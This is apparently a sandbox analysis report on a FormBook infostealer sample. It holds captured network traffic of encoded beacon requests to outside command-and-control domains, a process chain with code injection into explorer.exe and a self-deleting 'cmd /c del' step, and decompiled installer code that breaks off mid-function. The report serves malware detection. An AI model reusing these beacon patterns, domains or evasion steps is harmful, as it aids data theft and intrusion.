61 6c 6d 61 76 65 6e 75 65 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 70<html><body>You are being <a href="https://www.onesothebysrealty.com/39palmavenue">redirected</a>.</body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49747	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:52.076121092 CET	6397	OUT	GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1 Host: www.buildassetswealth.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:52.215910912 CET	6397	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 08:19:52 GMT Content-Type: text/html Content-Length: 275 ETag: "603155b9-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49748	104.21.76.239	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:19:57.363087893 CET	6399	OUT	GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1 Host: www.beconfidentagain.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:19:57.433413982 CET	6400	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 08:19:57 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Tue, 23 Feb 2021 09:19:57 GMT Location: https://www.beconfidentagain.com/4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha cf-request-id: 086f924d5800000c651184c000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uy2dIjQ0nCI30FyxF7TryTCFlKZVe6i0WOQUYmyQB9uCommyFeXKh9PYClp8t%2Bzcx%2BrmopSYRWNR%2BAcNz4w8TD1memlpcGTuMOdnYKOCCrh52FU7NMgfcaY%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 625f865bcee80c65-AMS Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49749	92.249.45.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:20:07.902918100 CET	6401	OUT	GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1 Host: www.rehabcareconnect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:20:08.052963018 CET	6403	IN	HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Last-Modified: Tue, 09 Jul 2019 06:18:14 GMT Etag: "999-5d2431a6-2d9d76b743ab0996;;;" Accept-Ranges: bytes Content-Length: 2457 Date: Tue, 23 Feb 2021 08:20:07 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
Feb 23, 2021 09:20:08.052984953 CET	6404	IN	Data Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
Feb 23, 2021 09:20:08.052998066 CET	6404	IN	Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49752	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:20:13.180762053 CET	6423	OUT	GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1 Host: www.speedysnacksbox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:20:13.319900990 CET	6423	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 08:20:13 GMT Content-Type: text/html Content-Length: 275 ETag: "6031584e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: lpdKSOB78u.exe PID: 6076 Parent PID: 5712

General

Start time:	09:18:17
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\lpdKSOB78u.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\lpdKSOB78u.exe'
Imagebase:	0x400000
File size:	217653 bytes
MD5 hash:	F10054D325DF455C58ECB16EA660D3F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: lpdKSOB78u.exe PID: 5652 Parent PID: 6076

General

Start time:	09:18:17
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\lpdKSOB78u.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\lpdKSOB78u.exe'
Imagebase:	0x7ff7488e0000
File size:	217653 bytes
MD5 hash:	F10054D325DF455C58ECB16EA660D3F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 5652

General

Start time:	09:18:22
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: raserver.exe PID: 6748 Parent PID: 3388

General

Start time:	09:18:43
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\raserver.exe
Imagebase:	0x1330000
File size:	108544 bytes
MD5 hash:	2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6956 Parent PID: 6748

General

Start time:	09:18:47
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
Imagebase:	0xc50000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6964 Parent PID: 6956

General

Start time:	09:18:48
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: lpdKSOB78u.exe PID: 6076 Parent PID: 5712 lpdKSOB78u.exeCOMMON

Executed Functions

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\lpdKSOB78u.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
